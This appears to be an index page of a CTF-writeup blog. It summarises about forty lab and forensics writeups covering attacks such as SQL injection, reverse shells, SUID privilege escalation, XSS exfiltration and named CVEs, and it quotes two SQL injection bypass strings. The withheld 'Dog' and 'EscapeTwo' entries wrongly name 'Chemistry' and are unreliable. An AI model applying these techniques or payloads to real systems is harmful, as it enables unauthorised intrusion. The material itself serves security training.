CTF-Writeup
Found 42 related articles.
Back to Categories- 2025-03-23
Volatility3 Analysis of STRELASTEALER via Rundll32 Proxy Execution
Detailed forensic analysis of a Windows memory dump using Volatility3 to investigate a compromise at a financial institution. The analysis identifies a hidden malicious PowerShell process (powershell.exe -windowstyle hidden) abusing WebDAV to execute a second-stage payload (3435.dll) via rundll32.exe. This activity aligns with MITRE ATT&CK sub-technique T1218.011. The investigation determines the attacker's C2 IP (45.9.74.32), the compromised user ('Elon'), and correlates the C2 infrastructure with the STRELASTEALER malware family.
- 2025-03-11
ApiBase - API Endpoint Enumeration and Privilege Escalation
Technical writeup detailing the compromise of a DockerLabs API-based system. Methodology includes Nmap scanning, API endpoint enumeration (GET/POST methods), credential brute-forcing via Caido, file transfer (SCP), and PCAP network analysis using Wireshark to extract critical credentials for root access.
- 2025-03-08
Dog - Active Machine Writeup (Content Withheld)
Content is currently withheld as per HackTheBox policy, since Chemistry is an active machine. This writeup details the full exploitation path from initial access to root, likely involving chemical-themed web application vulnerabilities, service enumeration, and local privilege escalation on a Linux target.
- 2025-03-03
Internship - Multi-Stage Exploitation via SQLi and Steganography
Technical writeup covering multi-stage compromise of the 'Internship' challenge. The methodology progresses from SQL Injection authentication bypass and user data extraction to a targeted SSH brute-force attack (Hydra). Privilege escalation involves script modification for horizontal movement, culminating in steganography analysis (Steghide) for final root access.
- 2025-03-02
EscapeTwo - Active Machine Writeup (Content Withheld)
Content is currently withheld as per HackTheBox policy, since Chemistry is an active machine. This writeup details the full exploitation path from initial access to root, likely involving chemical-themed web application vulnerabilities, service enumeration, and local privilege escalation on a Linux target.
- 2025-02-23
The Crime - Mobile Forensics with ALEAPP to Reconstruct a Crime Timeline
Detailed mobile forensics writeup solving a murder case by analyzing an extracted Android device using ALEAPP. The analysis successfully traces the victim's final actions, identifying the primary financial stressor (Olymptrade and a 250,000 EGP debt owed to 'Shady Wahab'), the victim's final known location ('The Nile Ritz-Carlton'), planned escape route ('Las Vegas' flight ticket), and a final scheduled meeting location ('The Mob Museum') based on Discord chat logs.
- 2025-02-19
Titanic - Active Machine Writeup (Content Withheld)
Content is currently withheld as per HackTheBox policy, since Titanic is an active machine. This writeup details the full exploitation path from initial access to root, likely involving web vulnerabilities, service enumeration, and local privilege escalation.
- 2025-02-19
UnderPass - Active Machine Writeup (Content Withheld)
Content is currently withheld as per HackTheBox policy, since UnderPass is an active machine. This writeup details the full exploitation path from initial access to root, likely involving web vulnerabilities, service misconfigurations, and local privilege escalation.
- 2025-02-19
Instant - APK Decompilation, LFI via Swagger API, and Solar-PuTTY Backup Decryption
Technical writeup detailing the compromise of the Instant machine. Initial foothold is achieved through static analysis of a downloadable APK file, revealing subdomains and a hardcoded API key. This key is used to exploit a Local File Inclusion (LFI) vulnerability within the authenticated Swagger API (via the logs reading function), leading to SSH key exfiltration and user access. Privilege escalation is achieved by locating, transferring, and decrypting an encrypted Solar-PuTTY sessions backup file, which yields the root password.
- 2025-02-17
Network Forensics of LLMNR/NBT-NS Poisoning Attacks
Detailed network forensics writeup investigating an LLMNR/NBT-NS poisoning incident using Wireshark. The analysis tracks the attack chain, identifying the initial mistyped network query (FILESHAARE), the attacker's rogue IP (192.168.232.215), the compromised user (janesmith) whose NTLM hash was intercepted via SMB, and the hostname of the accessed machine (AccountingPC), demonstrating the vulnerability of unauthenticated name resolution protocols.
- 2025-02-06
WebStrike - Network Forensics of Web Shell Upload and Data Exfiltration
Detailed network forensics writeup analyzing a PCAP file to investigate a web shell incident. The analysis successfully identifies the attack's origin (Tianjin, China), the attacker's User-Agent, and the exploitation of a file upload vulnerability to deploy a malicious web shell ('image.jpg.php' in the /reviews/uploads/ directory). Further investigation reveals the attacker's attempt to establish a reverse shell to port 8080 and the subsequent data exfiltration of the sensitive /etc/passwd file.
- 2025-01-30
UFO-1 - Sandworm Team (APT44) MITRE ATT&CK TTP Analysis
Research writeup focusing on the Sandworm Team (APT44), a highly aggressive Russian APT group, using the MITRE ATT&CK framework. Analysis covers their TTPs, critical infrastructure attacks (e.g., 2016 Ukraine power grid, 2022 SCADA attacks), key malware (e.g., Industroyer2, NotPetya, Exaramel), persistence methods, and specific tools used for code execution and data destruction.
- 2025-01-26
Noxious - LLMNR Poisoning and NTLMv2 Hash Cracking
Network forensics writeup detailing the analysis of an LLMNR poisoning attack. The process covers identifying the rogue device via LLMNR and DHCP traffic, locating the victim's credential leak (NTLMv2 hash) within SMB Session Setup packets, extracting NTLM Challenge/Response components, and performing hash cracking with Hashcat to recover the plaintext password, providing full context on the credential theft incident.
- 2024-12-05
TheStickerShop - Stored XSS Leading to Data Exfiltration
Technical writeup detailing the compromise of TheStickerShop. The primary vulnerability exploited is a Stored Cross-Site Scripting (XSS) vulnerability found in the 'Feedback' form on the Python/Werkzeug web server (8080/tcp). The attack leverages a custom JavaScript payload to bypass a 401 Unauthorized error, fetch the restricted 'flag.txt' file, encode its content in Base64, and exfiltrate the data to an attacker-controlled HTTP server via an Image object request.
- 2024-12-05
Volatility3 Analysis of a Credential Stealer Trojan
Detailed forensic analysis of a Windows memory dump compromised by the Amadey Trojan. This investigation utilizes Volatility3 to identify the main malicious process (lssass.exe), determine its location on the filesystem (Temp folder), confirm its nature via VirusTotal, track its C2C network connections (41.75.84.12), and discover persistence mechanisms (Scheduled Tasks and DLL payload execution via rundll32.exe).
- 2024-12-04
Vaccine - FTP, PKZIP/MD5 Cracking, SQL Injection via SQLMap, and SUID vi Privesc
Technical writeup detailing the compromise of the Vaccine machine. Initial access is achieved by exploiting Anonymous FTP to retrieve a password-protected PKZIP file, cracking the PKZIP and subsequent MD5 hashes to gain web credentials. Authentication leads to exploiting a blind SQL Injection vulnerability via SQLMap, gaining an OS shell. Privilege escalation is completed by finding plaintext credentials for SSH access, then exploiting the SUID binary 'vi' with specific permissions via the ':shell' command to achieve a root shell.
- 2024-12-02
Oopsie - IDOR, Arbitrary File Upload, and SUID Path Hijacking
Technical writeup detailing the compromise of the Oopsie machine. Initial access involves exploiting an IDOR vulnerability to enumerate credentials, followed by cookie manipulation to gain access to an arbitrary file upload function for a PHP reverse shell. Privilege escalation is achieved by finding plaintext database credentials for SSH access, and finally, exploiting the SUID binary '/usr/bin/bugtracker' using a PATH hijacking technique to execute a root shell.
- 2024-11-28
Archetype - SMB Credential Disclosure, MSSQL xp_cmdshell RCE, and SYSTEM Privileges via psexec
Technical writeup detailing the compromise of the Archetype Windows machine. Initial foothold is achieved by exploiting Anonymous SMB access (445/tcp) to retrieve SQL credentials from a shared backup directory (prod.dtsConfig). These credentials are used to gain access to the MSSQL service (1433/tcp), where xp_cmdshell is activated to achieve RCE and establish a reverse shell. Privilege escalation to NT AUTHORITY sYSTEM is completed by hunting for credentials in the PowerShell history file and leveraging Impacket's psexec.py with the found administrator account.
- 2024-11-27
Alert - XSS to LFI, Hash Cracking, and Group Write Privilege Escalation
Technical writeup detailing the compromise of the Alert Linux machine. Initial access is gained by chaining a Stored XSS vulnerability in the Markdown viewer to a Local File Inclusion (LFI) vulnerability in an internal /messages endpoint. LFI is used to exfiltrate an Apache MD5 hash from the .htpasswd file, which is then cracked via Hashcat to obtain SSH credentials for the 'albert' user. Privilege escalation is achieved by identifying a high-privileged PHP process running as root in a directory with group write permissions (management), which the 'albert' user belongs to. The configuration.php file is modified to set the SUID bit on /bin/bash, granting a root shell.
- 2024-11-23
Responder - LFI/RFI Chain to NTLMv2 Hash Capture and WinRM Access
Technical writeup detailing the initial compromise of the Responder machine. The attack chain involves exploiting a Local File Inclusion (LFI) vulnerability in a PHP application, escalating it to an RFI-style attack by injecting a UNC path to force an SMB authentication attempt. The resulting NTLMv2 hash is captured using the Responder tool, cracked with Hashcat, and used to gain full remote access via Evil-WinRM on port 5985.
- 2024-11-21
Three - S3 Bucket Misconfiguration and Remote Code Execution via AWS CLI
Technical writeup detailing the compromise of the Three machine. The methodology involves identifying an exposed subdomain (s3.thetoppers.htb) pointing to an AWS S3 bucket. Exploitation is achieved by leveraging a misconfigured access policy via the AWS CLI to perform an arbitrary file upload of a PHP webshell. Remote Code Execution (RCE) is then established using the webshell, leading to full system access as the www-data user.
- 2024-11-20
Crocodile - FTP Anonymous Login and Credential Disclosure
Technical writeup detailing the compromise of the Crocodile machine. Initial access is achieved by exploiting the Anonymous FTP login vulnerability on the vsFTPd 3.0.3 service (21/tcp) to disclose files containing credentials (allowed.userlist and allowed.userlist.passwd). Web enumeration via Gobuster reveals a hidden '/login.php' endpoint. The disclosed 'admin' credentials are used to access the web panel and retrieve the flag, completing the box.
- 2024-11-19
Sequel - Exploiting Unauthenticated MariaDB Access (A07:2021)
Technical writeup detailing the compromise of the Sequel machine. The methodology focuses on Nmap scanning to identify the exposed MariaDB service (version 10.3) on port 3306. The system is exploited due to a critical Identification and Authentication Failure (OWASP A07:2021) allowing unauthenticated root login. The process concludes with database enumeration (SHOW DATABASES, USE htb, SELECT * FROM config) to retrieve the flag.
- 2024-11-18
Appointment - Authentication Bypass via SQL Injection (SQLi)
Technical writeup detailing the compromise of the Appointment machine. The primary vulnerability is an Authentication Bypass via SQL Injection (SQLi) affecting the web application's login form. By injecting the payload 'admin'#' into the username field, the SQL query is manipulated to bypass the password check, allowing unauthenticated access as the admin user to retrieve the flag.
- 2024-11-06
Whiterose - IDOR, EJS SSTI (CVE-2022-29078), and Sudoedit Bypass (CVE-2023-22809)
Technical writeup detailing the compromise of the Whiterose machine. Initial access involves subdomain enumeration via wFuzz and exploiting an IDOR vulnerability to retrieve privileged user credentials. This leads to a Server-Side Template Injection (SSTI) RCE via CVE-2022-29078 (EJS Template Engine vulnerability). Privilege escalation is achieved by exploiting the Sudoedit vulnerability CVE-2023-22809 to gain root access via modifying the /etc/sudoers file.
- 2024-10-31
StellarJWT - JWT Exploitation and Chained SUID Privilege Escalation
Technical writeup detailing the compromise of the 'StellarJWT' challenge. The methodology involves identifying and decoding an exposed JSON Web Token (JWT) for user enumeration, followed by a dictionary attack using Hydra for SSH access. Privilege escalation is achieved through a chained exploitation of NOPASSWD SUID binaries: using 'socat' for horizontal movement and 'chown' for '/etc/passwd' modification to gain final root access.
- 2024-10-25
Verdejo - SSTI Exploitation and Base64 SUID Privesc Chain
Technical writeup detailing the compromise of the 'Verdejo' challenge. Initial access is gained by exploiting a Server-Side Template Injection (SSTI) vulnerability via Jinja2 to obtain a reverse shell. Privilege escalation is achieved by exploiting NOPASSWD SUID on '/usr/bin/base64' to read the root SSH private key, which is then cracked using ssh2john and JohnTheRipper for final root access.
- 2024-10-21
Chemistry - Pymatgen RCE (CVE-2024-23346), SSH Port Forwarding, and aiohttp LFI (CVE-2024-23334)
Technical writeup detailing the compromise of the Chemistry machine. Initial access (RCE) is gained by exploiting CVE-2024-23346, an arbitrary code execution vulnerability in the pymatgen library via a malicious .CIF file upload, leading to a low-privileged shell. Privilege escalation is achieved by locating hidden credentials in a SQLite database, gaining SSH access, and then using SSH Port Forwarding to access an internal web service. The final step involves exploiting CVE-2024-23334, a critical path traversal vulnerability in aiohttp/3.9.1, to perform Local File Inclusion (LFI) and read the /etc/shadow file for root access.
- 2024-10-20
TwoMillion - API Enumeration, Information Disclosure, and Kernel Privilege Escalation (CVE-2023-0386)
Technical writeup detailing the compromise of the TwoMillion machine. Initial access involves decoding ROT13-encrypted data from JavaScript to find an API endpoint, followed by manipulating API parameters to gain administrator privileges via Insecure Direct Object Reference (IDOR), leading to a reverse shell injection. Local Privilege Escalation is achieved by disclosing plaintext credentials from a '.env' file for SSH access, and finally, exploiting the unpatched Linux Kernel vulnerability, CVE-2023-0386 (OverlayFS/FUSE), to gain root privileges.
- 2024-10-20
Cap - PCAP Analysis, FTP Credential Disclosure, and cap_setuid Privilege Escalation
Technical writeup detailing the compromise of the Cap machine. Initial access is achieved by enumerating a web application that provides downloadable .PCAP network capture files. Tshark analysis of a specific PCAP file reveals FTP credentials in plaintext. These credentials are used to gain SSH access as the 'nathan' user. Privilege escalation to root is achieved by exploiting the 'cap_setuid' capability set on the /usr/bin/python3.8 binary, allowing arbitrary user ID change to 0 (root).
- 2024-10-16
EvilCUPS - CUPS Vulnerability Chaining (CVEs) and Local Credential Compromise
Technical writeup detailing the compromise of the EvilCUPS machine. Initial access is achieved by exploiting a chain of CUPS vulnerabilities (including CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, CVE-2024-47177) to gain Remote Code Execution (RCE) as the 'lp' user. Local privilege escalation is then performed by manually enumerating the CUPS spool directory (/var/spool/cups) to extract cleartext credentials for the root user.
- 2024-10-15
Source - Webmin 1.890 RCE (CVE-2019-15107) Exploitation
Technical writeup detailing the immediate compromise of the Source machine by exploiting the Webmin service running on port 10000. The vulnerability leveraged is the unauthenticated Remote Code Execution (RCE) backdoor in Webmin versions 1.882 < 1.921 (CVE-2019-15107). Exploitation is achieved by running a public exploit to gain direct root access and establishing a reverse shell for full system control.
- 2024-10-11
TickTackRoot - FTP Anonymous, SSH Brute-Force, and SUID Binary Exploitation
Technical writeup detailing the compromise of the TickTackRoot machine. The path includes initial enumeration of open services (21/FTP, 22/SSH, 80/HTTP). Access is gained by leveraging Anonymous FTP login to find potential usernames, followed by a successful SSH brute-force attack using Hydra. Privilege escalation is achieved by exploiting the SUID binary 'timeout_suid' to gain a root shell, demonstrating a classic Linux privilege escalation technique.
- 2024-10-09
BreakMySSH - Exploiting OpenSSH CVE-2018-15473 for Root Access
Technical writeup detailing the compromise of the BreakMySSH challenge. Methodology covers Nmap scanning, exploiting the OpenSSH 7.7 Username Enumeration vulnerability (CVE-2018-15473) to identify a valid user, followed by a targeted password brute-force attack using Hydra to gain root access.
- 2024-10-01
WalkingCMS - WordPress Exploitation via Theme Editor and SUID Privilege Escalation
Technical writeup detailing the compromise of the WalkingCMS challenge. Initial access involves enumerating a WordPress installation via Gobuster, credential cracking using WPScan, and achieving a reverse shell by modifying the theme's index.php file. Final root access is achieved by exploiting a vulnerable SUID binary, '/usr/bin/env', using standard Linux privilege escalation techniques.
- 2024-09-18
Injection - SQLi Authentication Bypass and SUID Privilege Escalation
Technical writeup covering the compromise of the 'Injection' challenge. Methodology includes port scanning, exploitation of a SQL Injection vulnerability for authentication bypass (' OR 1=1-- -), securing initial access via SSH, and leveraging a vulnerable SUID binary ('env') via GTFObins for root privilege escalation.
- 2024-09-17
Trust - SSH Brute-Force and Vim Sudo Privilege Escalation
Technical writeup detailing the compromise of the 'Trust' challenge. Methodology includes Nmap scanning and web fuzzing via Gobuster to identify hidden resources, a targeted Hydra brute-force attack to obtain SSH credentials, and final privilege escalation by exploiting the NOPASSWD sudo permission on the Vim binary.
- 2024-09-16
FirstHacking - Exploiting vsftpd 2.3.4 Backdoor (CVE-2011-2523)
Technical writeup demonstrating the exploitation of the vsftpd 2.3.4 backdoor (CVE-2011-2523) vulnerability on a DockerLabs environment. Methodology covers Nmap service detection, exploit identification via Searchsploit, remote command execution via the FTP service, and achieving immediate root access.
- 2024-09-05
Dancing - Exploiting Unauthenticated SMB Shares
Technical writeup detailing the initial compromise of the Dancing machine. The methodology focuses on thorough Nmap scanning to identify exposed SMB services (ports 139, 445), leveraging the 'smbclient' tool to enumerate and gain unauthorized access to publicly accessible network shares (WorkShares), and retrieving sensitive data (flags/notes) due to weak share permissions.
- 2024-09-05
Redeemer - Exploiting Unauthenticated Redis Access
Technical writeup detailing the compromise of the Redeemer machine. The methodology focuses on Nmap scanning to identify the exposed Redis service on port 6379, exploiting the lack of required authentication to connect directly using 'redis-cli', enumerating the key-value store with INFO and KEYS *, and retrieving the flag.
- 2024-09-04
Fawn - Exploiting Anonymous FTP Login
Technical writeup detailing the compromise of the Fawn machine. The methodology focuses on Nmap scanning to identify the exposed FTP service (vsftpd 3.0.3) on port 21, exploiting the 'Anonymous FTP Login Allowed' setting to gain unauthenticated access, and retrieving the flag via standard FTP file transfer protocols.
- 2024-09-03
Meow - Exploiting Weak Credentials via Telnet (Port 23)
Technical writeup detailing the compromise of the Meow machine. The methodology involves Nmap scanning to identify the exposed Telnet service on port 23 and exploiting weak, unauthenticated credentials (root access with no password) to gain immediate root control and retrieve the flag.